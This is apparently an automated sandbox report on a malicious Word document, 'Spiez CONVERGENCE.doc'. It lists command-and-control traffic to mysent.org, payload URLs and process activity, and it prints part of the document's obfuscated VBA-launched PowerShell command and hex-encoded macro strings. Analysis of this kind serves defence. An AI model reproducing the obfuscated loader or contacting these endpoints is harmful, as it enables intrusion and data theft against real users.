Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /modules/main.php HTTP/1.1Cookie: session=+6QNckPfZ1I1gtw1brM9/Zms3DU=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org

Found strings which match to known social media urls

Show sources

Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: mysent.org

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000006.00000002.16520228938.01B10000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535409082.01C40000.00000004.sdmp	String found in binary or memory: file://
Source: powershell.exe, 00000006.00000002.16520228938.01B10000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535409082.01C40000.00000004.sdmp	String found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.16478891432.075B0000.00000004.sdmp	String found in binary or memory: file:///C:
Source: mshta.exe, 00000009.00000002.16313457835.004A3000.00000004.sdmp	String found in binary or memory: file:///C:/U
Source: mshta.exe, 00000009.00000002.16313564201.004EB000.00000004.sdmp, mshta.exe, 00000009.00000003.16298178452.004E9000.00000004.sdmp, mshta.exe, 00000009.00000003.16301958229.004E9000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta...d;2CC
Source: mshta.exe, 00000009.00000002.16313596373.00504000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta.lnP
Source: mshta.exe, 00000009.00000002.16313457835.004A3000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta85-
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htaJ?;
Source: mshta.exe, 00000009.00000003.16300160098.008E2000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htafile:///C:/Users/luk
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htagtonex?:SM
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htahta:ZN?;dM
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htap?:
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htar?;XL
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htas?:XL
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htas?:XM
Source: mshta.exe, 00000009.00000003.16303244783.004B5000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htay?:RL
Source: mshta.exe, 00000009.00000002.16313480450.004B8000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htay?;SL
Source: WINWORD.EXE, 00000001.00000002.16433979410.003E8000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/Desktop/Spiez%20CONVERGENCE.doc
Source: WINWORD.EXE, 00000001.00000002.16433979410.003E8000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/Desktop/Spiez%20CONVERGENCE.doc?_
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp	String found in binary or memory: file:///C:/Win
Source: powershell.exe, 00000006.00000002.16517628488.00307000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/1
Source: powershell.exe, 00000006.00000002.16517720716.00370000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/Syste
Source: powershell.exe, 00000006.00000002.16517628488.00307000.00000004.sdmp, powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/F
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/System.SecurityFB
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/t
Source: mshta.exe, 00000009.00000002.16313531403.004D3000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/cmd.exe
Source: mshta.exe, 00000009.00000002.16313531403.004D3000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/cmd.exe5
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: http://
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://U
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?817531a
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabuke
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmp	String found in binary or memory: http://java.com/
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: http://java.com/help
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmp	String found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmp	String found in binary or memory: http://java.com/helpi
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmp	String found in binary or memory: http://java.com/http://java.com/
Source: WINWORD.EXE, 00000001.00000002.16433262957.00250000.00000004.sdmp	String found in binary or memory: http://ns.ao6
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponseH
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.doc	String found in binary or memory: http://www.day.com/dam/1.0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: http://www.micros)E
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.usertr
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: http://www.usertrust.com1
Source: cmd.exe, 00000004.00000002.16516367054.00240000.00000004.sdmp	String found in binary or memory: https://ae/5r
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, certutil.exe, 00000007.00000003.16275942034.000BC000.00000004.sdmp	String found in binary or memory: https://api.
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp	String found in binary or memory: https://api.onedrive.com
Source: powershell.exe, 00000006.00000002.16517720716.00370000.00000004.sdmp, powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp	String found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp	String found in binary or memory: https://api.t
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmp	String found in binary or memory: https://dgdadq.dm.files.1drv.com/y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmp	String found in binary or memory: https://dgdadq.dm.files.1drv.com/y4mVzbqwRuj1C7DKiYnOrp-73Jp9DKjpCqzrMtj97lJqJqe60hkQd1iNG47CEm9yn-z
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmp	String found in binary or memory: https://dgdadq.dm.files.1drv.comh%
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://myse
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.o
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.oH
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: https://mysent.org/
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp	String found in binary or memory: https://mysent.org/Q
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.lo
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.log.txH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.log.txt
Source: certutil.exe, 00000007.00000002.16278676993.000B0000.00000004.sdmp, certutil.exe, 00000007.00000002.16280487798.00810000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.log.txtC:
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.log.txtH
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	String found in binary or memory: https://mysent.org/access.log.txtt
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp, powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/hpmys.txt
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/hpmys.txtH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmp	String found in binary or memory: https://mysent.org/hpmys.txtTz
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	String found in binary or memory: https://mysent.org/hpmys.txtt
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org/modules/admin.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: https://mysent.org/modules/default.php
Source: powershell.exe, 0000000E.00000002.16540874995.05B4E000.00000004.sdmp	String found in binary or memory: https://mysent.org/modules/default.phpd
Source: powershell.exe, 0000000E.00000002.16540874995.05B4E000.00000004.sdmp	String found in binary or memory: https://mysent.org/modules/default.phpx
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	String found in binary or memory: https://mysent.org/modules/main.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org:443
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org:443/modules/admin.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org:443/modules/default.php
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	String found in binary or memory: https://mysent.org:443/modules/default.php8
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp	String found in binary or memory: https://mysent.org:443/modules/main.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp	String found in binary or memory: https://mysent.org:443t
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: Spiez CONVERGENCE.doc	String found in binary or memory: https://www.labor-spiez.ch/pdf/de/rue/Spiez_Convergence_2014_web.pdf
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.doc	String found in binary or memory: https://www.labor-spiez.ch/pdf/de/rue/Spiez_Convergence_2014_web.pdfyX
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp	String found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2
Source: Spiez CONVERGENCE.doc	String found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2016_02_FINAL.pdf
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.doc	String found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2016_02_FINAL.pdfyX

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Spiez CONVERGENCE.doc	OLE, VBA macro line: Sub MultiPage1_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MultiPage1_Layout			Name: MultiPage1_Layout

Document contains an embedded VBA macro which may execute processes

Show sources

Source: Spiez CONVERGENCE.doc	OLE, VBA macro line: kHrLt.Run HKfHjGpejTz, XDQaMTq, True
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function ETlScgoBRhHyaCajTIq, API IWshShell3.Run("C:\WinDoWS\sysTEm32\CMD.EXe /c "SeT STI= $iBHrW = [tyPE]("{2}{7}{8}{3}{0}{5}{1}{6}{4}"-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .("{0}{1}{2}"-f'S','ET','-iTEM') ("{0}{2}{1}" -f 'VAr','Le:7B1M','iAB') ([tYPe]("{2}{3}{1}{0}" -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]("{0}{1}"-F 'R','EF') ; ^&("{1}{2}{0}"-f '-iTEM','SE','T') ("{1}{0}{2}"-f'iAbL','vAr','e:04k') ( [tyPe]("{4}{3}{0}{1}{5}{2}"-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]("{0}{1}{6}{4}{2}{5}{3}"-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .("{2}{0}{1}" -f'E','M','seT-iT') ("V"+"Ar"+"Ia"+"Ble:kmd") ( [tYPe]("{6}{3}{4}{5}{0}{2}{1}"-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]("{2}{0}{4}{1}{5}{3}"-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .("{2}{3}{0}{1}" -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath "$env:USERPROFILE\\AppData\\Local\\Microsoft" -E			Name: ETlScgoBRhHyaCajTIq

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: Spiez CONVERGENCE.doc	OLE, VBA macro line: Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MultiPage1_Layout, String createobject: Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))			Name: MultiPage1_Layout

Document contains an embedded VBA with hexadecimal encoded strings

Show sources

Source: Spiez CONVERGENCE.doc	Stream path 'Macros/VBA/ThisDocument' : found hex strings
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 529f9d539f9d549f
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 9f9d569f9d539f9d579f9d
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 877383717589766c77
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 498e494b7f5f469d7882636e9f9f676e75879d424a504a44
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 6b76424f996b906691
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 809e504a449d529f9d
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 918792758c6b9b8a668f92858c6f91907b736b6a8b78927b84

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 131.253.33.213 443	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 188.241.39.220 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 204.79.197.213 443	Jump to behavior

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 6530
Source: unknown	Process created: Commandline size = 4760
Source: unknown	Process created: Commandline size = 4760
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: Commandline size = 6530	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 4760
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 4760

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cerEC93.tmp

Creates mutexes

Show sources

